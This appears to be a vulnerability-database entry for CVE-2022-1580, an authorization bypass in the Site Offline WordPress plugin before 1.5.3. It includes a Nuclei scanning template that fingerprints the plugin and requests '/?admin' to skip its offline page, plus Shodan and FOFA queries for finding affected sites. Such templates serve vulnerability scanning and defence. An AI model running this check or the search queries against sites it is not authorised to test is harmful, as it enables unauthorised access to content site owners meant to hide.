Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2022-1580
HistoryMay 08, 2024 - 11:45 a.m.

Site Offline WP Plugin < 1.5.3 - Authorization Bypass

2024-05-0811:45:01
ProjectDiscovery
github.com
4
site offline plugin
authorization bypass
vulnerability
wordpress
cvss 3.1
cwe 639

4.3 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

LOW

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

4.5 Medium

AI Score

Confidence

High

0.001 Low

EPSS

Percentile

30.3%

The plugin prevents users from accessing a website but does not do so if the URL contained certain keywords. Adding those keywords to the URL's query string would bypass the plugin's main feature.
id: CVE-2022-1580

info:
  name: Site Offline WP Plugin < 1.5.3 - Authorization Bypass
  author: Kazgangap
  severity: medium
  description: |
    The plugin prevents users from accessing a website but does not do so if the URL contained certain keywords. Adding those keywords to the URL's query string would bypass the plugin's main feature.
  remediation: Fixed in 1.5.3
  reference:
    - https://wpscan.com/vulnerability/7b6f91cd-5a00-49ca-93ff-db7220d2630a/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-1580
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 4.3
    cve-id: CVE-2022-1580
    cwe-id: CWE-639
    epss-score: 0.00069
    epss-percentile: 0.29862
    cpe: cpe:2.3:a:freehtmldesigns:site_offline:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: freehtmldesigns
    product: "site_offline"
    framework: wordpress
    publicwww-query: "/wp-content/plugins/site-offline/"
    shodan-query: http.html:/wp-content/plugins/site-offline/
    fofa-query: body=/wp-content/plugins/site-offline/
  tags: cve,cve2022,wpscan,site-offline,wordpress,wp-plugin,wp,freehtmldesigns
flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/site-offline/readme.txt"

    matchers:
      - type: word
        internal: true
        words:
          - 'Site Offline Or Coming Soon Or Maintenance Mode'

  - method: GET
    path:
      - "{{BaseURL}}/?admin"

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "wp-block", "author")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a004730450220072d1ea8c6583e0d3fe84dc24f784423c21251e8eba6b1c28c9c98bf9362dcf40221009c36b590c9d4e5e4eba214c446cdac5ff2a7e0475283468004e64a314476be8f:922c64590222798bb761d5b6d8e72950

4.3 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

LOW

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

4.5 Medium

AI Score

Confidence

High

0.001 Low

EPSS

Percentile

30.3%